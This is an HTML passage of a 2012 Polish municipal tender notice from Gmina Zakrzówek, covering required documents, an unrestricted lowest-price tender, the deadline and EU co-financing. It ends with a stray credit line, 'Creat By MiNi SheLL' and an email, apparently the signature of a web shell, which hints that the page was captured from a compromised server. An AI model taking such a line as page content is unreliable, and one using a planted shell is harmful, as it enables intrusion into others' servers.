<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę umowy w przypadku zmiany obowiązującej stawki podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ugzakrzowek.bip.e-zeto.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Zakrzówek
ul. Żeromskiego 24
23-213 Zakrzówek
Pok. Nr 4D.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2012 godzina 10:00, miejsce: Urząd Gminy Zakrzówek
ul. Żeromskiego 24
23-213 Zakrzówek
Sekretariat (Pok. Nr 7).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013, Oś priorytetowa VI-Środowisko i czysta energia, Działanie 6.1 Ochrona i kształtowanie środowiska.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com